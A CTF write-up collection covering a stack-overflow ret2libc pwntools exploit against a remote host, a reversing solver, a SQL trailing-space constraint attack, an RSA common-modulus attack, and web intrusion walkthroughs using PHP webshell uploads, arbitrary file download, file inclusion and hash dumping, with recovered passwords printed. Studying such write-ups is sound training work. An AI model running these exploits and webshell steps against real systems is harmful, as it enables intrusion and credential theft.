How to analyze CTF challenge writeups


This article walks through writeups for several CTF challenges.

0x01 PWN
This is a fairly simple PWN challenge. Open the binary in IDA and look over the program (see the IDA screenshot in the original post).

The game() function reads into a stack buffer with read() and the binary has no stack canary, so the 0x34-byte read overruns the buffer and overwrites game's return address. The exploit takes two rounds. First round: return into write@plt with game() as write's own return address and the arguments (1, write@got, 4), so the program prints write's libc address and then loops back into game(). Subtracting libc's write offset and adding its system offset gives the address of system. Second round: the name is stored at the global address 0x804A06C, so send "/bin/sh" as the name and overwrite the return address with system, passing 0x804A06C as its argument; system("/bin/sh") runs. The padding check: 32 bytes of filler plus five 4-byte words is exactly 52 = 0x34 bytes, the size of the read. Python exploit (pwntools):

```python
from pwn import *


def run_game_again(p, yourname, flag):
    """One pass through game(): answer the name prompt, then send the overflowing 'flag' answer."""
    p.recvuntil(b"First,what's your name?\n")
    p.send(yourname + b"\n")
    p.recvuntil(b"do you want to get flag?\n")
    p.send(flag)


pwnelf = ELF("./pwn")
libcelf = ELF("./libc-2.23.so")
gameadd = 0x080485CB                    # game(); used as the return address so the program loops
plt_write = pwnelf.symbols["write"]
got_write = pwnelf.got["write"]

# p = process("./pwn", env={"LD_PRELOAD": "./libc-2.23.so"})   # local test with the remote libc
p = remote("117.50.60.184", 12345)

# Round 1: 32 bytes of padding, then write@plt, return into game(), and the arguments write(1, write@got, 4).
run_game_again(p, b"ichuqiu", b"0" * 32 + p32(plt_write) + p32(gameadd) + p32(1) + p32(got_write) + p32(4))
write_addr = u32(p.recv(4))
print("pwn write", hex(write_addr))
libcelf_system_add = libcelf.symbols["system"] + write_addr - libcelf.symbols["write"]
print("pwn libcelf_system_add", hex(libcelf_system_add))

# Round 2: the name "/bin/sh" lands at 0x804A06C; return into system with that address as its argument.
run_game_again(p, b"/bin/sh", b"0" * 32 + p32(libcelf_system_add) + p32(gameadd) + p32(0x804A06C))
p.interactive()
```

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

0x02 Antidbg
Locate the key function in IDA. It contains a comparison loop; at first glance the compared value looked like an 8-digit number, so the comparison was split up into its parts (the stack buffers and lookup tables below) and replayed in a script.
```python
# Antidbg: replay the flag-checking loop from the stack buffers and tables read out in IDA.
# Stack buffers the loop compares against (hex as dumped, little-endian):
# [ebp+var_6C] 01050D02070106010206000B07010C06
# [ebp+var_4C] 02080602
# [ebp+var_5C] 0100070D020108080D000103040D0303
# [ebp+var_48] 02050009
# [ebp+var_44] 00000D02


def cover(buf):
    """Decode a hex string and reverse the byte order (the stack dump is little-endian)."""
    return bytes.fromhex(buf)[::-1]


def cover_hex_lines(buf):
    """Turn a multi-line IDA hex dump into raw bytes."""
    return bytes.fromhex(buf.replace(" ", "").replace("\r", "").replace("\n", ""))


# Concatenate the buffers in the order the loop walks them: var_6C, var_5C, var_4C, var_48, var_44.
var_6c = (cover("01050D02070106010206000B07010C06")
          + cover("0100070D020108080D000103040D0303")
          + cover("02080602") + cover("02050009") + cover("00000D02"))
# print(len(var_6c))  # 44 bytes; the loop only uses the first 42

byte_402178 = cover_hex_lines("""
02 02 02 02 03 01 01 02 01 01 02 01 01 00 01 01
02 02 00 01 01 01 01 00 01 01 02 02 00 01 01 02
02 01 01 01 01 01 02 01 01 03 00 00 00 00 00 00
00 00 00 00 00 00 00 00 03 03 0D 04 03 01 00 0D
08 08 01 02 0D 07 00 01 06 0C 01 07 0B 00 06 02
01 06 01 07 02 0D 05 01 00 00 00 00 EF 28 68 5B
00 00 00 00 02 00 00 00 48 00 00 00 E4 22 00 00
E4 16 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00
0C 00 00 00 14 00 00 00 2C 23 00 00 2C 17 00 00
00 00 00 00 EF 28 68 5B 00 00 00 00 0D 00 00 00
54 02 00 00 40 23 00 00 40 17 00 00 00 00 00 00
EF 28 68 5B 00 00 00 00 0E 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 A0 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 30 40 00 00 E0 22 40 00 01 00 00 00
E8 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
""")

byte_402138 = cover_hex_lines("""
00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00
04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00
08 00 00 00 09 00 00 00 0A 00 00 00 0B 00 00 00
0C 00 00 00 0D 00 00 00 0E 00 00 00 0F 00 00 00
""")

dword_403018 = cover_hex_lines("""
02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00
00 00 00 00 00 00 00 00
""")

# .text:0040110E mov ecx, [ebp+var_4]
# .text:00401111 xor ecx, ebp
# .text:00401113 mov dword_40301C, 3
# .text:0040111D mov dword_403020, 6
# .text:00401127 mov dword_403024, 7
# The program overwrites three entries of this table at runtime, so the values in memory differ
# from the static dump; patch the dump the same way before using it.
dword_403018 = (dword_403018[0:4] + b"\x03" + dword_403018[5:8] + b"\x06"
                + dword_403018[9:12] + b"\x07" + dword_403018[13:])
print(dword_403018.hex())

flag = ""
for i in range(0, 42):
    # byte_402178 selects a dword of dword_403018, which supplies the high nibble of the character;
    # var_6c selects a dword of byte_402138, which supplies the low nibble.
    # (The "<< 4" was lost when the writeup was published; the tables only hold nibbles,
    # 2/3/6/7 on the high side and 0..15 on the low side, which only give printable ASCII when combined this way.)
    hightnum = dword_403018[byte_402178[i] * 4] << 4
    numbershow = hightnum + byte_402138[var_6c[i] * 4]
    flag += chr(numbershow)
print(flag)
```

flag{06b16a72-51cc-4310-88ab-70ab68290e22}

0x03 sqli
This challenge is a SQL constraint attack. Register a user named "admin " (admin followed by a trailing space) with any password that satisfies the password rules, then log in with that password and the flag is displayed. The trick works because MySQL's PAD SPACE collations ignore trailing spaces in string comparison, so a lookup for username 'admin' also matches the row whose username is 'admin '.

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 RSA
Dump both public keys with openssl:

```
openssl rsa -inform PEM -in pubkey1.pem -pubin -text
Public-Key: (2048 bit)
Modulus:
    00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
    3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
    8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
    bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
    a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
    c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
    dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
    ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
    4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
    70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
    03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
    79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
    ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
    2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
    e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
    e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
    8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
    42:17
Exponent: 2333 (0x91d)

openssl rsa -inform PEM -in pubkey2.pem -pubin -text
Public-Key: (2048 bit)
Modulus:
    (byte for byte identical to pubkey1)
Exponent: 23333 (0x5b25)
```

The two public keys share the same modulus n and differ only in e, so the flag can be recovered with an RSA common modulus attack. Because gcd(2333, 23333) = 1, there are integers s1, s2 with s1*e1 + s2*e2 = 1, and then c1^s1 * c2^s2 = m^(s1*e1 + s2*e2) = m (mod n). One of the two coefficients is negative; that exponent is applied to the modular inverse of its ciphertext. Python script:

```python
from libnum import n2s, s2n
from gmpy2 import invert
import base64
import gmpy2


def bignumber(hexstr):
    """Turn the colon-stripped hex modulus printed by `openssl rsa -text` into an int."""
    rn = 0
    for b in bytes.fromhex(hexstr):
        rn = rn << 8          # the shift operator was lost when the writeup was published
        rn += b
    return rn


n = """00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:
3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:
8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:
bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:
a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:
c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:
dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:
ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:
4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:
70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:
03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:
79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:
ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:
2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:
e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:
e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:
8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:
42:17""".replace(":", "").replace(" ", "").replace("\r", "").replace("\n", "")
# print(n)
n = bignumber(n)
print(hex(n))
e1 = 2333
e2 = 23333


def egcd(a, b):
    """Pure-Python extended Euclid, (g, x, y) with a*x + b*y == g; an alternative to gmpy2.gcdext."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)


flag1 = base64.b64decode(open("flag1.enc", "rb").read())
flag2 = base64.b64decode(open("flag2.enc", "rb").read())
c1 = s2n(flag1)
c2 = s2n(flag2)
# gcdext returns (g, s1, s2) with s1*e1 + s2*e2 == g == 1. One coefficient is negative;
# a negative exponent is applied to the modular inverse of that ciphertext instead.
g, s1, s2 = gmpy2.gcdext(e1, e2)
assert g == 1
if s1 < 0:
    c1, s1 = invert(c1, n), -s1
if s2 < 0:
    c2, s2 = invert(c2, n), -s2
print(s1, s2)
m = pow(int(c1), int(s1), n) * pow(int(c2), int(s2), n) % n
print(n2s(m))
```

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}

0x05 抛砖引玉
1. From the CMS version, look up the vulnerability details on the wooyun mirror site. The site has SQL injection, but the user table in the database is empty. There is also an arbitrary file download vulnerability: down.php?urls=data/../config.php downloads the config file, which contains the password of the DB_user account mvoa: define('DB_PWD','B!hpp3Dn1.'); flag: B!hpp3Dn1.
2. http://url/www.zip returns a backup of the site; its config.php contains the password of the DB_user account root: define('DB_PWD','mypasswd'); flag: mypasswd

0x06 暗度陈仓
1. The download path /u-are-admin/download.php?dl= reports "file not found" (for the u-Are-Admin/u-upload-file folder), which reveals the key directory /u-Are-Admin/. flag: /u-Are-Admin/
2. Files can be uploaded under /u-Are-Admin/. Upload a one-line PHP webshell with the extension in mixed case (Php) to bypass the extension filter, connect with China Chopper (菜刀), and run net user to read the full name of the administrator account Hack. flag: Hacked356
3. The shell can read admin.txt on the super administrator's desktop directly. flag: ad16a159581c7085c771f
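A worked example of the mechanism behind challenge 0x03, added here and not part of the original writeup. It assumes a MySQL users table with no UNIQUE key on username and a PAD SPACE collation (utf8mb4_general_ci; MySQL 8's default utf8mb4_0900_ai_ci is NO PAD and would not behave this way); the table layout, the login query and the password values are constructed for the example, and it further assumes the application's own duplicate-name check did not catch the trailing-space variant, which is what lets the second row in.

```sql
-- Added example (MySQL), not code from the original writeup.
-- Assumptions: no UNIQUE key on username, PAD SPACE collation utf8mb4_general_ci,
-- and a login query that compares username and password with plain '='.
-- Passwords are stored in clear only to keep the example short.
CREATE TABLE users (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci NOT NULL,
  password VARCHAR(64) NOT NULL
);

-- The real administrator (constructed password value).
INSERT INTO users (username, password) VALUES ('admin', 'real-admin-password');

-- Under a PAD SPACE collation trailing spaces do not count in comparisons:
-- this already returns the real admin row.
SELECT id, username FROM users WHERE username = 'admin ';

-- Registration step from the writeup: sign up as 'admin ' (trailing space) with your own password.
-- Nothing in the schema rejects it.
INSERT INTO users (username, password) VALUES ('admin ', 'attacker-password');

-- Login step: the application looks up username 'admin' with the attacker's password.
-- 'admin ' compares equal to 'admin', so the attacker's row comes back and the session is "admin".
SELECT id, username, password
FROM users
WHERE username = 'admin' AND password = 'attacker-password';

-- Hardening: remove the rogue row (byte-wise match so the real admin is untouched),
-- add a UNIQUE key (rows that differ only in trailing spaces are duplicates under PAD SPACE),
-- and compare usernames byte for byte at login.
DELETE FROM users WHERE CAST(username AS BINARY) = 'admin ';
ALTER TABLE users ADD UNIQUE KEY uq_username (username);
-- INSERT INTO users (username, password) VALUES ('admin ', 'attacker-password');
--   -> ERROR 1062 Duplicate entry 'admin ' for key 'users.uq_username'
SELECT id, username
FROM users
WHERE CAST(username AS BINARY) = 'admin' AND password = 'attacker-password';
-- returns no row: the admin account can no longer be reached through 'admin '
```

Run it in a MySQL session: the first SELECT returns the admin row for 'admin ', the login SELECT returns the attacker's row, and after the UNIQUE key is in place the commented-out re-registration fails with a duplicate-key error.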
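To make the common modulus attack from 0x04 reproducible offline, here is an added, self-contained Python version that needs neither gmpy2, libnum nor the challenge files; it is not the writeup's own code. The modulus is constructed for the example from the Mersenne primes 2^61-1 and 2^89-1 and the message is made up, while the exponents 2333 and 23333 are the challenge's. It spells out the step the writeup's script leaves implicit: which ciphertext has to be inverted when a Bezout coefficient is negative.

```python
# Added example: RSA common-modulus attack in pure Python. Not the writeup's own code.
# The key below is constructed for the example (two Mersenne primes); only the exponents
# come from the challenge. No private key is ever used.

P = 2**61 - 1        # M61, prime (constructed, not the challenge's modulus)
Q = 2**89 - 1        # M89, prime
N = P * Q            # ~150-bit modulus, large enough for a 16-byte message
E1 = 2333            # exponent of pubkey1 in the challenge
E2 = 23333           # exponent of pubkey2 in the challenge


def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def modinv(a, n):
    """Modular inverse of a mod n via the extended Euclid above."""
    g, x, _ = egcd(a % n, n)
    if g != 1:
        raise ValueError("value is not invertible modulo n")
    return x % n


def encrypt(m, e, n):
    """Textbook RSA encryption; the challenge gave us two such ciphertexts of the same m."""
    return pow(m, e, n)


def common_modulus_attack(n, e1, e2, c1, c2):
    """Recover m from c1 = m^e1 and c2 = m^e2 (same n) when gcd(e1, e2) == 1.

    With a*e1 + b*e2 == 1, c1^a * c2^b == m^(a*e1 + b*e2) == m (mod n).
    A negative coefficient is applied to the modular inverse of its ciphertext.
    """
    g, a, b = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents must be coprime")
    if a < 0:
        c1, a = modinv(c1, n), -a
    if b < 0:
        c2, b = modinv(c2, n), -b
    return pow(c1, a, n) * pow(c2, b, n) % n


def int_to_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def demo(plaintext=b"flag{common_mod}"):
    """Encrypt one constructed message under both exponents, then recover it without the private key."""
    m = int.from_bytes(plaintext, "big")
    if m >= N:
        raise ValueError("message too long for the toy modulus")
    c1 = encrypt(m, E1, N)
    c2 = encrypt(m, E2, N)
    return int_to_bytes(common_modulus_attack(N, E1, E2, c1, c2))


if __name__ == "__main__":
    print(demo())
```

For the challenge's exponents egcd(2333, 23333) yields a = -7781 and b = 778, so c1 is the ciphertext that gets inverted; swapping the order of the keys swaps the signs, and the function handles both.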
0x07 瞒天过海
1. AWVS finds an injection point at /cat.php?id=2. sqlmap runs against it directly, and the injection yields the backend administrator's plaintext password, serverlog. flag: serverlog
2. The injection also yields the root password hash, *21C5210729A90C69019F01FED76FAD4654F27167, which cmd5 cracks to rootserver. flag: rootserver
3. After logging in, the log download feature under "Download log" allows arbitrary file download: /classes/downloadfile.php?file=../../../../../../password.txt fetches password.txt from the root of the C: drive. flag: c9c35cf409344312146fa7546a94d1a6

0x08 偷梁换柱
1. AWVS finds a .git source leak. GitHack downloads the whole source tree, and the database file contains the username and password (admin / Admin@pgsql). flag: Admin@pgsql
2. Log in with those credentials. The image management page accepts uploads, so upload an image carrying a one-line PHP webshell, take the displayed image URL and remove "small" from it to get the real path, /admin/uploads/111.php.png. China Chopper connects to it directly, since the .png is parsed as PHP; then run net user in the virtual terminal to get the full name of the administrator account ichunqiu.
3. Chopper can read /tmp/access.log directly; the flag is the first 16 characters of its contents.
0x09 反客为主
1. The scanner finds a file inclusion and a .txt file containing a full-featured PHP webshell. Get a shell by including it: url/info/include.php?filename=..//sjk-uploads/UareHack.txt, shell password a. With the shell, read Documents.txt in the phpStudy directory.
2. With the shell, read password.txt on the Desktop of the ichunqiu user.
3. After getting the shell an msf payload would not connect back, so QuarksPwDump was used to dump the ichunqiu user's password hash (pwdump format, LM hash followed by NT hash), which an online cracker resolved: 78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da::: flag: 123qwe123

That covers the writeups for these CTF challenges; hopefully the material is useful.
